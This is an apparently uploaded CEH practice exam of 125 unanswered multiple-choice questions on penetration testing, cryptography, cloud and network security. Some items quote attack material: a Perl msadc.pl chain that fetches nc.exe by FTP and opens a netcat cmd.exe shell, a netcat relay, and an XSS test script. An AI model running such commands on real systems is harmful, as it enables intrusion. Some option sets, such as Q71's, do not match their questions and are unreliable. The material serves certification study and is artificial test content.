11 - CEH-EXAM TEST - TOPIC IV FINAL - Question

The document provides information about various cybersecurity topics including penetration testing techniques, cloud security threats, cryptographic standards, and Public Key Infrastructure components. Specifically, it discusses capturing administrator Remote Desktop traffic to obtain login credentials, denial-of-service attacks on cloud services, and symmetric cryptographic standard 3DES.

Uploaded by

Jannet Okechukwu

CEH EXAM FINAL 2

1- An organization hires a tester to do a wireless penetration test. Previous reports indicate that the last
test did not contain management or control packets in the submitted traces. Which of the following is the
most likely reason for lack of management or control packets?
The wireless card was not turned on.
The wrong network card drivers were in use by Wireshark.
On Linux and Mac OS X, only 802.11 headers are received in promiscuous mode.
Certain operating systems and adapters do not collect the management or control packets.

2- CloudSign, a digital certificate authority, recently adopted cloud technology to meet growing
business demand. Within a week of moving to the cloud, CloudSign was targeted with a massive denial-of-
service attack. When CloudSign contacted its cloud service provider, the provider stated that it was not
responsible for the attack on the company under the existing SLA between the two parties. Which of the
following cloud threats is referred to in the above scenario?
Abuse of cloud services
Malicious insiders
Insufficient due diligence
Account hijacking

3- A corporation hired an ethical hacker to test if it is possible to obtain users' login credentials using methods
other than social engineering. Access to offices and to a network node is granted to the hacker. Results from
server scanning indicate that all are adequately patched and physical access is denied; thus, administrators
have access only through Remote Desktop. Which technique could be used to obtain login credentials?
Capture every user's traffic with Ettercap.
Capture LANMAN hashes and crack them with LC6.
Guess passwords using Medusa or Hydra against a network service.
Capture administrators' RDP traffic and decode it with Cain and Abel.

4-An attacker has captured a target file that is encrypted with public key cryptography. Which of the attacks
below is likely to be used to crack the target file?
Timing attack
Replay attack
Memory trade-off attack
Chosen plain-text attack

5- Which of the following is a symmetric cryptographic standard?
DSA
PKI
RSA
3DES

6- Which of the following describes a component of Public Key Infrastructure (PKI) where a copy of a private
key is stored to provide third-party access and to facilitate recovery operations?
Key registry
Recovery agent
Directory
Key escrow

7- Which of the following is a common Service Oriented Architecture (SOA) vulnerability?
Cross-site scripting
SQL injection
VPath injection
XML denial of service issues

8- What is the best defense against privilege escalation vulnerability?
Patch systems regularly and upgrade interactive login privileges at the system administrator level.
Run administrator and applications on least privileges and use a content registry for tracking.
Run services with least privileged accounts and implement multi-factor authentication and authorization.
Review user roles and administrator privileges for maximum utilization of automation services.

9- A company has publicly hosted web applications and an internal Intranet protected by a firewall. Which
technique will help protect against enumeration?
Reject all invalid email received via SMTP.
Allow full DNS zone transfers.
Remove A records for internal hosts.
Enable null session pipes.

10- Which initial procedure should an ethical hacker perform after being brought into an organization?
Begin security testing.
Turn over deliverable.
Sign a formal contract with non-disclosure.
Assess what the organization is trying to protect.

11- Xsecurity Services wants to roll out its innovative cloud services for SMEs. The company wants to
provide its cloud service with the following characteristics:
Infrastructure should have dedicated resources for the client
Infrastructure should store data on an exclusive machine
Infrastructure should completely control the cloud server
Infrastructure should have the capability to manage increased resources depending upon the requirements
and the usage of the client
It should provide security by employing custom firewalls

Which of the following cloud deployment models fulfils the requirements above?
Community Cloud
Hybrid Cloud
Public Cloud
Private Cloud

12- Which of the following processes evaluates the adherence of an organization to its stated security policy?
Vulnerability assessment.
Penetration testing.
Risk assessment.
Security auditing.

13- How can telnet be used to fingerprint a web server?
telnet webserverAddress 80 HEAD / HTTP/1.0
telnet webserverAddress 80 PUT / HTTP/1.0
telnet webserverAddress 80 HEAD / HTTP/2.0
telnet webserverAddress 80 PUT / HTTP/2.0

14- ICMP ping and ping sweeps are used to check for active systems and to check
if ICMP ping traverses a firewall.
the route that the ICMP ping took.
the location of the switchport in relation to the ICMP ping.
the number of hops an ICMP ping takes to reach a destination.

15- A consultant is hired to do physical penetration testing at a large financial company. On the first day of
his assessment, the consultant goes to the company's building dressed like an electrician and waits in
the lobby for an employee to pass through the main access gate; the consultant then follows the
employee through the gate to get into the restricted area. Which type of attack did the consultant perform?
Man trap.
Tailgating.
Shoulder surfing.
Social engineering.

16- Which of the following tools would be the best choice for achieving compliance with PCI Requirement
11?
Truecrypt
Sub7
Nessus
Clamwin

17- A security consultant decides to use multiple layers of antivirus defense, such as end user desktop
antivirus and e-mail gateway. This approach can be used to mitigate which attack?
Forensic attack
ARP spoofing attack
Social engineering attack
Scanning attack

18- How can a rootkit bypass the Windows 7 operating system's kernel-mode code signing policy?
Defeating the scanner from detecting any code change at the kernel
Replacing patched system calls with its own version that hides the rootkit (attacker's) actions
Performing common services for the application process and replacing real applications with fake ones
Attaching itself to the master boot record in a hard drive and changing the machine's boot sequence

19- Pentest results indicate that voice over IP traffic is traversing a network. Which of the following tools will
decode a packet capture and extract the voice conversations?
Cain and Abel
John the Ripper
Nikto
Hping

20- A link pops up on a shopping site asking you to click on it. As soon as the link is clicked, you are asked to
share the link on Facebook. A Facebook login screen appears and you log in to your account. Once the
credentials are submitted, the Facebook account is compromised. This is an example of what type of mobile attack?
Session hijacking
Clickjacking attack
Cross-site Scripting (XSS)
SQL injection attacks

21- In keeping with the best practices of layered security, where are the best places to place intrusion
detection/intrusion prevention systems? (Choose two.)
HID/HIP (Host-based Intrusion Detection/Host-based Intrusion Prevention)
NID/NIP (Node-based Intrusion Detection/Node-based Intrusion Prevention)
NID/NIP (Network-based Intrusion Detection/Network-based Intrusion Prevention)
CID/CIP (Computer-based Intrusion Detection/Computer-based Intrusion Prevention)

22- A penetration tester is hired to do a risk assessment of a company's DMZ. The rules of engagement state
that the penetration test has to be done from an external IP address with no prior knowledge of the internal
IT systems. What kind of test is being performed?
White box
Grey box
Red box
Black box

23- Which type of access control is used on a router or firewall to limit network activity?
Mandatory.
Discretionary.
Rule-based.
Role-based.

24- The following is a sample of output from a penetration tester's machine targeting a machine with the IP
address of 192.168.1.106:
[ATTEMPT] target 192.168.1.106 - login "root" - pass "a" 1 of 20
[ATTEMPT] target 192.168.1.106 - login "root" - pass "123" 2 of 20
[ATTEMPT] target 192.168.1.106 - login "testuser" - pass "a" 3 of 20
[ATTEMPT] target 192.168.1.106 - login "testuser" - pass "123" 4 of 20
[ATTEMPT] target 192.168.1.106 - login "admin" - pass "a" 5 of 20
[ATTEMPT] target 192.168.1.106 - login "admin" - pass "123" 6 of 20
[ATTEMPT] target 192.168.1.106 - login "" - pass "a" 7 of 20
[ATTEMPT] target 192.168.1.106 - login "" - pass "123" 8 of 20

What is most likely taking place?


Ping sweep of the 192.168.1.106 network
Remote service brute force attempt
Port scan of 192.168.1.106
Denial of service attack on 192.168.1.106

25- On a Linux device, which of the following commands will start the Nessus client in the background so
that the Nessus server can be configured?
nessus +
nessus *s
nessus &
nessus -d

26- During a penetration test, a tester finds a target that is running MS SQL 2000 with default credentials.
The tester assumes that the service is running with a Local System account. How can this weakness be
exploited to access the system?
Using the Metasploit psexec module setting the SA / Admin credential
Invoking the stored procedure xp_shell to spawn a Windows command shell
Invoking the stored procedure cmd_shell to spawn a Windows command shell
Invoking the stored procedure xp_cmdshell to spawn a Windows command shell

27- John, an ethical hacker, is demonstrating a proof-of-concept IoT attack. For this demonstration, he used
a jammer to jam and sniff the code sent by the car remote of a victim to unlock his car. Due to the jamming,
the vehicle did not open; so the victim sent a code again to unlock his car. John sniffed the second code as
well. After sniffing and capturing the second code, he forwarded the first code to the car which opened it.
John can use the second code in future to unlock the car. What kind of attack did John demonstrate?
Rolling Code Attack
Side Channel Attack
BlueBorne Attack
Sybil Attack

28- When an alert rule is matched in a network-based IDS like snort, the IDS does which of the following:
Drops the packet and moves on to the next one
Continues to evaluate the packet until all rules are checked
Stops checking rules, sends an alert, and lets the packet continue
Blocks the connection with the source IP address in the packet

29- A tester is attempting to capture and analyze the traffic on a given network and realizes that the network
has several switches. What could be used to successfully sniff the traffic on this switched network? (Choose
three.)
Address Resolution Protocol (ARP) spoofing
MAC duplication
MAC flooding
SYN flooding
Reverse smurf attack
ARP broadcasting

30- While performing data validation of web content, a security technician is required to restrict malicious
input. Which of the following processes is an efficient way of restricting malicious input?
Validate web content input for query strings.
Validate web content input with scanning tools.
Validate web content input for type, length, and range.
Validate web content input for extraneous queries.

31- To send a PGP encrypted message, which piece of information from the recipient must the sender have
before encrypting the message?
Recipient's private key
Recipient's public key
Master encryption key
Sender's public key

32- A circuit level gateway works at which of the following layers of the OSI Model?
Layer 5 - Application
Layer 4 – TCP
Layer 3 – Internet protocol
Layer 2 – Data link

33- The intrusion detection system at a software development company suddenly generates multiple alerts
regarding attacks against the company's external webserver, VPN concentrator, and DNS servers. What
should the security team do to determine which alerts to check first?
Investigate based on the maintenance schedule of the affected systems.
Investigate based on the service level agreements of the systems.
Investigate based on the potential effect of the incident.
Investigate based on the order that the alerts arrived in.

34- One advantage of an application-level firewall is the ability to
Filter packets at the network level.
Filter specific commands, such as http:post.
Retain state information for each packet.
Monitor TCP handshaking.

35- The Open Web Application Security Project (OWASP) testing methodology addresses the need to secure
web applications by providing which one of the following services?
An extensible security framework named COBIT.
A list of flaws and how to fix them.
Web application patches.
A security certification for hardened web applications.

36- If a tester is attempting to ping a target that exists but receives no response or a response that states the
destination is unreachable, ICMP may be disabled and the network may be using TCP. Which other option
could the tester use to get a response from a host using TCP?
Hping
Traceroute
TCP ping
Broadcast ping

37- During session hijacking penetration testing on the organization's network, the organization learned
that the network is vulnerable to session hijacking because it uses the Telnet and rlogin protocols for logon,
authentication, and data transmission.
Which of the following preventive measures does the organization need to implement to protect its
network from session hijacking attacks?
Use OpenSSH or SSH (Secure Shell)
Enable compression mechanism of HTTP requests
Increase the life span of a session or a cookie
Use PAP (Password Authentication Protocol) for authentication

38- What type of OS fingerprinting technique sends specially crafted packets to the remote OS and analyzes
the received response?
Passive
Reflective
Active
Distributive

39- What is the name of the international standard that establishes a baseline level of confidence in the
security functionality of IT products by providing a set of requirements for evaluation?
Blue Book
ISO 26029
Common Criteria
The Wassenaar Agreement

40- When creating a security program, which approach would be used if senior management is supporting
and enforcing the security policy?
A bottom-up approach.
A top-down approach.
A senior creation approach.
An IT assurance approach.

41- Which of the following processes of PKI (Public Key Infrastructure) ensures that a trust relationship exists
and that a certificate is still valid for specific operations?
Certificate issuance
Certificate validation
Certificate cryptography
Certificate revocation

42- Low humidity in a data center can cause which of the following problems?
Heat.
Corrosion.
Static electricity.
Airborne contamination.

43- What is the primary drawback of using the Advanced Encryption Standard (AES) algorithm with a 256-bit key
to share sensitive data?
Due to the key size, the time it will take to encrypt and decrypt the message hinders efficient communication.
To get messaging programs to function with this algorithm requires complex configurations.
It has been proven to be a weak cipher; therefore, should not be trusted to protect sensitive data.
It is a symmetric key algorithm, meaning each recipient must receive the key through a different channel
than the message.

44- Jailbreaking provides root access to the operating system and permits downloading of third-party
applications, themes, and extensions on iOS devices. Which of the following jailbreaking exploits allows user-level
access but does not allow iBoot-level access?
iBoot Exploit
Userland Exploit
Bootrom Exploit
Cydia Exploit

45- Which technical characteristic do Ethereal/Wireshark, TCPDump, and Snort have in common?
They are written in Java.
They send alerts to security monitors.
They use the same packet analysis engine.
They use the same packet capture utility.

46- A Certificate Authority (CA) generates a key pair that will be used for encryption and decryption of emails.
The integrity of the encrypted email is dependent on the security of which of the following?
Public key
Private key
Modulus length
Email server certificate

47- James works as a cloud security professional with XSecurity Consultant. He is performing a security
assessment on a small healthcare provider’s cloud network. James started penetration testing by
searching for virtual machines on the client host network to identify all the machines, appliances, and
services running in the virtual environment. What will help James discover all the virtual machines on
the client’s network?
Use the ping utility to discover the virtual environments
Use the Nmap tool to detect virtual machines
Check IP address information on virtual NICs
Use the Google search engine to discover the virtual environments

48- An IT security engineer notices that the company’s web server is currently being hacked. What should
the engineer do next?
Unplug the network connection on the company’s web server.
Determine the origin of the attack and launch a counterattack
Record as much information as possible from the attack.
Perform a system restart on the company’s web server.

49- A pentester is using Metasploit to exploit an FTP server and pivot to a LAN. How will the pentester
pivot using Metasploit?
Issue the pivot exploit and set the meterpreter.
Reconfigure the network settings in the meterpreter.
Set the payload to propagate through the meterpreter.
Create a route statement in the meterpreter.

50- Which of the following ensures that updates to policies, procedures, and configurations are made in
a controlled and documented fashion?
Regulatory compliance
Peer review
Change management
Penetration testing

51- An attacker sniffs encrypted traffic from the network and is subsequently able to decrypt it. Which
cryptanalytic technique can the attacker use now in his attempt to discover the encryption key?
Birthday attack
Known plaintext attack
Meet in the middle attack
Chosen ciphertext attack

52- Which of the following examples best represents a logical or technical control?
Security tokens
Heating and air conditioning
Smoke and fire alarms
Corporate security policy

53- How can rainbow tables be defeated?
Password salting
Use of non-dictionary words
All uppercase character passwords
Lockout accounts under brute force password cracking attempts

54- When does the Payment Card Industry Data Security Standard (PCI-DSS) require organizations
to perform external and internal penetration testing?
At least once a year and after any significant upgrade or modification.
At least once every three years or after any significant upgrade or modification.
At least twice a year or after any significant upgrade or modification.
At least once every two years and after any significant upgrade or modification.

55- Which of the following is an application that requires a host application for replication?
Micro
Worm
Trojan
Virus

56- Which of the following is a component of a risk assessment?
Physical security.
Administrative safeguards.
DMZ.
Logical interface.

57- Which of the following markup languages enables SSO delegation and risk-based authentication in the
cloud environment, specifically preventing phishing and MitM attacks?
Security Assertion Markup Language (SAML)
Service Provisioning Markup Language (SPML)
eXtensible Access Control Markup Language (XACML)
Open Authentication (OAuth)

58- The fundamental difference between symmetric and asymmetric key cryptographic systems is that
symmetric key cryptography uses__________________?
Multiple keys for non-repudiation of bulk data
Different keys on both ends of the transport medium
Bulk encryption for data transmission over fiber
The same key on each end of the transmission medium

59- Danish has recently completed a professional cloud training sponsored by his organization and wants to
implement cloud technologies in his organization. Danish is new to cloud technology, and before
launching the company's cloud services, he decided to create test machines and configurations where he
could test the performance of cloud services. Due to the lack of a cloud/virtualization policy, Danish mistakenly
created several machines he was unable to monitor. Which of the following terms defines the above
situation?
CloudCracker
Cloud sprawl
Malicious insider
Abuse of cloud services

60- A penetration tester is attempting to scan an internal corporate network from the Internet without
alerting the border sensor. Which of the following techniques should the tester consider using?
Spoofing an IP address
Tunneling scan over SSH
Tunneling over high port numbers
Scanning using fragmented IP packets

61- Which system consists of a publicly available set of databases that contain domain name registration
contact information?
WHOIS
IANA
CAPTCHA
IETF

62- One way to defeat a multi-level security solution is to leak data via
A bypass regulator.
Steganography.
A covert channel.
Asymmetric routing.

63- Your company has recently received several complaints where cloud service users reported suspicious
activities in their account. The network security team in your company suspects the accounts were victims
of session hijacking attacks. Which of the following network layer security controls will prevent attacks such
as session hijacking?
DNSSEC
DLP
IAM
HIDS

64- Which of the following network attacks takes advantage of weaknesses in the fragment reassembly
functionality of the transmission control protocol (TCP) or Internet protocol (IP)stack?
Teardrop attack
SYN flood attack
Smurf attack
Ping of death attack

65- What is the outcome of the command "nc -l -p 2222 | nc 10.1.0.43 1234"?
Netcat will listen on the 10.1.0.43 interface for 1234 seconds on port 2222.
Netcat will listen on port 2222 and output anything received to a remote connection on 10.1.0.43 port
1234.
Netcat will listen for a connection from 10.1.0.43 on port 1234 and output anything received to port 2222.
Netcat will listen on port 2222 and then output anything received to local interface 10.1.0.43.

66- A company firewall engineer has configured a new DMZ to allow public systems to be located away from
the internal network. The engineer has three security zones set:
Untrust (Internet) – (Remote network = 217.77.88.0/24)
DMZ (DMZ) – (11.12.13.0/24)
Trust (Intranet) – (192.168.0.0/24)
The engineer wants to configure remote desktop access from a fixed IP on the remote network to a remote
desktop server in the DMZ. Which rule would best fit this requirement?
Permit 217.77.88.0/24 11.12.13.0/24 RDP 3389
Permit 217.77.88.12 11.12.13.50 RDP 3389
Permit 217.77.88.12 11.12.13.0/24 RDP 3389
Permit 217.77.88.0/24 11.12.13.50 RDP 3389

67- A person approaches a network administrator and wants advice on how to send encrypted email from
home. The end user does not want to have to pay for any license fees or manage server services. Which of
the following is the most secure encryption protocol that the network administrator should recommend?
IP Security (IPSEC)
Multipurpose Internet Mail Extensions (MIME)
Pretty Good Privacy (PGP)
Hyper Text Transfer Protocol with Secure Socket Layer (HTTPS)

68- A hacker is attempting to see which ports have been left open on a network. Which NMAP switch would
the hacker use?
-sO
-sP
-sS
-sU

69- When utilizing technical assessment methods to assess the security posture of a network, which of the
following techniques would be most effective in determining whether end-user security training would be
beneficial?
Vulnerability scanning
Social engineering
Application security testing
Network sniffing

70- James wants to prevent reflective DoS attacks from being able to compromise his network. What steps
can James take to prevent these attacks?
James will need to block all TCP port 17185 traffic on the firewall
James should configure his network devices to recognize SYN source IP addresses that never complete their
connections
James needs to block all UDP traffic coming in on port 1001 to prevent future reflective DoS attacks against
their network
James should configure his firewall so that it blocks FIN packets that are sent to the broadcast address of the
company's internal IP range

71- Which of the following are variants of mandatory access control (MAC) mechanisms? (Choose two.)
Two factor authentication
Acceptable use policy
Username / password
User education program
Sign in register

72- A hacker is attempting to use nslookup to query Domain Name Service (DNS). The hacker uses the
nslookup interactive mode for the search. Which command should the hacker type into the command shell
to request the appropriate records?
Locate type=ns
Request type=ns
Set type=ns
Transfer type=ns

73- A security engineer has been asked to deploy a secure remote access solution that will allow employees
to connect to the company’s internal network. Which of the following can be implemented to minimize the
opportunity for the man-in-the-middle attack to occur?
SSL
Mutual authentication
IPSec
Static IP addresses

74- An ethical hacker for a large security research firm performs penetration tests, vulnerability tests, and
risk assessments. A friend recently started a company and asks the hacker to perform a penetration
test and vulnerability assessment of the new company as a favor. What should the hacker's next step
be before starting work on this job?
Start by footprinting the network and mapping out a plan of attack.
Ask the employer for authorization to perform the work outside the company.
Begin the reconnaissance phase with passive information gathering and then move into active information
gathering.
Use social engineering techniques on the friend's employees to help identify areas that may be susceptible
to attack.

75- What is the main difference between a “Normal” SQL Injection and a “Blind” SQL Injection
vulnerability?
The request to the web server is not visible to the administrator of the vulnerable application.
The attack is called “Blind” because, although the application properly filters user input, it is still vulnerable
to code injection.
A successful attack does not show an error message to the administrator of the affected application.
The vulnerable application does not display errors with information about the injection results to the
attacker.

76- An engineer is learning to write exploits in C and is using Kali Linux. The engineer wants to compile
the newest C exploit and name it calc.exe. Which command would the engineer use to accomplish this?
g++ hackersExploit.cpp -o calc.exe
g++ hackersExploit.py -o calc.exe
g++ -i hackersExploit.pl -o calc.exe
g++ --compile -i hackersExploit.cpp -o calc.exe

77- A penetration tester was hired to perform a penetration test for a bank. The tester began searching
for IP ranges owned by the bank, performing lookups on the bank's DNS servers, reading news articles online
about the bank, watching the bank employees time in and out, searching the bank's job postings (paying
special attention to IT related jobs), and visiting the local dumpster for the bank's corporate office. What
phase of the penetration test is the tester currently in?
Information reporting
Vulnerability assessment
Active information gathering
Passive information gathering

78- A computer science student needs to fill some information into a secured Adobe PDF job application that
was received from a prospective employer. Instead of requesting a new document that allowed the forms
to be completed, the student decides to write a script that pulls passwords from a list of commonly used
passwords, to try against the secured PDF until the correct password is found or the list is exhausted. Identify
the type of password attack.
Man-in-the-middle attack
Brute-force attack
Dictionary attack
Session hijacking

79- During a wireless penetration test, a tester detects an access point using the WPA2 encryption. Which
of the following attacks should be used to obtain the key?
The tester must capture the WPA2 authentication handshake and then crack it.
The tester must use the tool inSSIDer to crack it using the ESSID of the network.
The tester cannot crack WPA2 because it is in full compliance with the IEEE 802.11i standard.
The tester must change the MAC address of the wireless network card and then use the AirTraf tool to obtain
the key.

80- Which of the following resources does NMAP need to be used as a basic vulnerability scanner
covering several vectors like SMB, HTTP and FTP?
Metasploit scripting engine
Nessus scripting engine
NMAP scripting engine
SAINT scripting engine

81- A security analyst is performing an audit on the network to determine if there are any deviations from
the security policies in place. The analyst discovers that a user from the IT department had a dial-out modem
installed. Which security policy must the security analyst check to see if dial-out modems are allowed?
Firewall-management policy
Acceptable-use policy
Remote-access policy
Permissive policy

82- When setting up a wireless network, an administrator enters a pre-shared key for security. Which of
the following is true?
The key entered is a symmetric key used to encrypt the wireless data.
The key entered is a hash that is used to prove the integrity of the wireless data.
The key entered is based on the Diffie-Hellman method.
The key is an RSA key used to encrypt the wireless data.

83- Windows file servers commonly hold sensitive files, databases, passwords and more. Which of the
following choices would be a common vulnerability that usually exposes them?
Cross-site scripting
SQL injection
Missing patches
CRLF injection

84- Which United States legislation mandates that the Chief Executive Officer (CEO) and the Chief Financial
Officer (CFO) must sign statements verifying the completeness and accuracy of financial reports?
Sarbanes-Oxley Act (SOX).
Gramm-Leach-Bliley Act (GLBA).
Fair and Accurate Credit Transactions Act (FACTA).
Federal Information Security Management Act (FISMA).

85- A recently hired network security associate at a local bank was given the responsibility to perform daily
scans of the internal network to look for unauthorized devices. The employee decides to write a script that
will scan the network for unauthorized devices every morning at 5:00 am. Which of the following
programming languages would most likely be used?
PHP
C#
Python
ASP.NET

86- While checking the settings on the internet browser, a technician finds that the proxy server settings have
been checked and a computer is trying to use itself as a proxy server. What specific octet within the subnet
does the technician see?
10.10.10.10
127.0.0.1
192.168.1.1
192.168.168.168

87- Which tool is used to automate SQL injections and exploit a database by forcing a given web application
to connect to another database controlled by a hacker?
DataThief
NetCat
Cain and Abel
SQL Injector

88- A stored biometric is vulnerable to attack. What is the main reason behind this?
The digital representation of the biometric might not be unique, even if the physical characteristic is unique.
Authentication using a stored biometric compares a copy to a copy instead of the original to a copy.
A stored biometric is no longer “something you are” and instead becomes “something you have.”
A stored biometric can be stolen and used by an attacker to impersonate the individual identified by the
biometric.

89- When analyzing the IDS logs, the system administrator notices connections from outside of the LAN have
been sending packets where the Source IP address and Destination IP address are the same. But no alerts
have been sent via email or logged in the IDS. Which type of an alert is this?
False positive
False negative
True positive
True negative

90- Which of the following items of a computer system will an anti-virus program scan for viruses?
Boot Sector
Deleted Files
Windows Process List
Password Protected Files

91- Which of the following is a detective control?
Smart card authentication.
Security policy.
Audit trail.
Continuity of operations plan.

92- Which of the following scanning tools is specifically designed to find potential exploits in Microsoft
Windows products?
Microsoft Security Baseline Analyzer
Retina
Core Impact
Microsoft Baseline Security Analyzer

93- Which of the following descriptions is true about a static NAT?
A static NAT uses a many-to-many mapping.
A static NAT uses a one-to-many mapping.
A static NAT uses a many-to-one mapping.
A static NAT uses a one-to-one mapping.

94- Which property ensures that a hash function will not produce the same hashed value for two different
messages?
Collision resistance
Bit length
Key strength
Entropy

95- A company has made the decision to host their own email and basic web services. The administrator
needs to set up the external firewall to limit what protocols should be allowed to get to the public part
of the company's network. Which ports should the administrator open? (Choose three.)
Port 22
Port 23
Port 25
Port 53
Port 80
Port 139
Port 445

96- Michael, a penetration tester from a pen test firm, performs a penetration test on the client's system.
The client wants to find and identify the OS running on a particular host computer and test it for known
deficiencies. Which of the following tools will Michael use to perform the penetration test?
Application-layer vulnerability assessment tools
Host-based vulnerability assessment tools
Scope assessment tools
Depth assessment tools

97- From the two screenshots below, which of the following is occurring?
10.0.0.253 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against 10.0.0.2.
10.0.0.253 is performing an IP scan against 10.0.0.2, 10.0.0.252 is performing a port scan against 10.0.0.2.
10.0.0.2 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against 10.0.0.2.
10.0.0.252 is performing an IP scan against 10.0.0.2, 10.0.0.252 is performing a port scan against 10.0.0.2.

98- Which type of scan is used on the eye to measure the layer of blood vessels?
Facial recognition scan
Retinal scan
Iris scan
Signature kinetics scan

99- Which NMAP command combination would let a tester scan every TCP port from a class C network
that is blocking ICMP with fingerprinting and service detection?
NMAP -PN -A -O -sS 192.168.2.0/24
NMAP -P0 -A -O -p1-65535 192.168.0/24
NMAP -P0 -A -sT -p0-65535 192.168.0/16
NMAP -PN -O -sS -p 1-1024 192.168.0/8

100- A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4
web server. While it is effective, the tester finds it tedious to perform extended functions. On further
research, the tester comes across a Perl script that runs the following msadc functions:
system("perl msadc.pl -h $host -C \"echo open $your >testfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>testfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>testfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>testfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>testfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>testfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>testfile\"");
system("perl msadc.pl -h $host -C \"ftp \-s\:testfile\"");
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");

Which exploit is indicated by this script?
A buffer overflow exploit
A chained exploit
A SQL injection exploit
A denial of service exploit

101- Which of the following lists are valid data-gathering activities associated with a risk assessment?
Threat identification, vulnerability identification, control analysis
Threat identification, response identification, mitigation identification
Attack profile, defence profile, loss profile
System profile, vulnerability identification, security determination

102- Which of the following approaches to vulnerability assessment is mainly focused on the hierarchical
interdependent vulnerabilities, such as server-based vulnerabilities or device-based vulnerabilities?
Product-based assessment solutions
Service-based assessment solution
Tree-based assessment
Inference-based assessment

103- A tester has been hired to do a web application security test. The tester notices that the site is dynamic
and must make use of a back end database. In order for the tester to see if an SQL injection is possible,
what is the first character that the tester should use to attempt breaking a valid SQL request?
Semicolon
Single quote
Exclamation mark
Double quote

104- An NMAP scan of a server shows port 25 is open. What risk could this pose?
Open printer sharing
Web portal data leak
Clear text authentication
Active mail relay

105- Which type of antenna is used in wireless communication?
Omnidirectional
Parabolic
Uni-directional
Bi-directional

106- Passive reconnaissance involves collecting information through which of the following?
Social engineering
Network traffic sniffing
Man in the middle attacks
Publicly accessible sources

107- While testing web applications, you attempt to insert the following test script into the search area on
the company's web site:
<script>alert('Testing Testing Testing')</script>
Afterwards, when you press the search button, a pop up box appears on your screen with the text
"Testing Testing Testing." What vulnerability is detected in the web application here?
A buffer overflow
Password attacks
Cross Site Scripting
A hybrid attack

108- OnCloud, a UK-based cloud service provider, hired Anthony, a cloud security professional. Anthony was
asked to select cloud formations for secure collaboration. Anthony decides on the Jericho Cloud Cube
Model for the organization.
Which dimension defines the physical location of data in the Jericho Model?
Internal (I) / External (E)
Proprietary (P) / Open (O)
Perimeterised (Per) / De-perimeterised (D-p) Architectures
Insourced / Outsourced

109- Which of the following is a hardware requirement that either an IDS/IPS system or a proxy server must
have in order to properly function?
Fast processor to help with network traffic analysis
They must be dual-homed
Similar RAM requirements
Fast network interface cards

110- A company has five different subnets: 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and
192.168.5.0. How can NMAP be used to scan these adjacent Class C networks?
NMAP -P 192.168.1-5.
NMAP -P 192.168.0.0/16
NMAP -P 192.168.1.0,2.0,3.0,4.0,5.0
NMAP -P 192.168.1/17

111- A hacker searches in Google for filetype:pcf to find Cisco VPN config files. Those files may contain
connectivity passwords that can be decoded with which of the following?
Cupp
Nessus
Cain and Abel
John The Ripper Pro

112- Employees in a company are no longer able to access Internet web sites on their computers. The
network administrator is able to successfully ping the IP addresses of web servers on the Internet and open
the web sites by using an IP address instead of the URL. The administrator runs the Nslookup command
for www.eccouncil.org and receives an error message stating there is no response from the server.
What should the administrator do next?
Configure the firewall to allow traffic on TCP ports 53 and UDP port 53.
Configure the firewall to allow traffic on TCP ports 80 and UDP port 443.
Configure the firewall to allow traffic on TCP port 53.
Configure the firewall to allow traffic on TCP port 8080.

113- Advanced Encryption Standard is an algorithm used for which of the following?
Data integrity
Key discovery
Bulk data encryption
Key recovery

114- Which type of intrusion detection system can monitor and alert on attacks, but cannot stop them?
Detective
Passive
Intuitive
Reactive

115- Which of the following are valid types of rootkits? (Choose three.)
Hypervisor level
Network level
Kernel level
Application level
Physical level
Data access level

116- Which of the following tools will scan a network to perform vulnerability checks and compliance
auditing?
NMAP
Metasploit
Nessus
BeEF

117- While conducting a penetration test, the tester determines that there is a firewall between the tester's
machine and the target machine. The firewall is only monitoring TCP handshaking of packets at the
session layer of the OSI model. Which type of firewall is the tester trying to traverse?
Packet filtering firewall
Application-level firewall
Circuit-level gateway firewall
Stateful multilayer inspection firewall

118- A large company intends to use Blackberry for corporate mobile phones and a security analyst is
assigned to evaluate the possible threats. The analyst will use the Blackjacking attack method to
demonstrate how an attacker could circumvent perimeter defenses and gain access to the corporate
network. What tool should the analyst use to perform a Blackjacking attack?
Paros Proxy
BBProxy
BBCrack
Blooover

119- Which of the following techniques will identify if computer files have been changed?
Network sniffing
Permission sets
Integrity checking hashes
Firewall alerts

120- Which of the following is a client-server tool utilized to evade firewall inspection?
TCP-over-dns
kismet
nikto
hping
121- At a Windows Server command prompt, which command could be used to list the running services?
Sc query type= running
Sc query \\servername
Sc query
Sc config

122- How do employers protect assets with security policies pertaining to employee surveillance activities?
Employers promote monitoring activities of employees as long as the employees demonstrate
trustworthiness.
Employers use informal verbal communication channels to explain employee monitoring activities to
employees.
Employers use network surveillance to monitor employee email traffic, network access, and to record
employee keystrokes.
Employers provide employees with written statements that clearly discuss the boundaries of monitoring
activities and the consequences.

123- Which of the following conditions must be given to allow a tester to exploit a Cross-Site Request Forgery
(CSRF) vulnerable web application?
The victim user must open a malicious link with an Internet Explorer prior to version 8.
The session cookies generated by the application do not have the HttpOnly flag set.
The victim user must open a malicious link with a Firefox prior to version 3.
The web application should not use random tokens.

124- Which set of access control solutions implements two-factor authentication?
USB token and PIN
Fingerprint scanner and retina scanner
Password and PIN
Account and password

125- To reduce the attack surface of a system, administrators should perform which of the following
processes to remove unnecessary software, services, and insecure configuration settings?
Harvesting
Windowing
Hardening
Stealthing
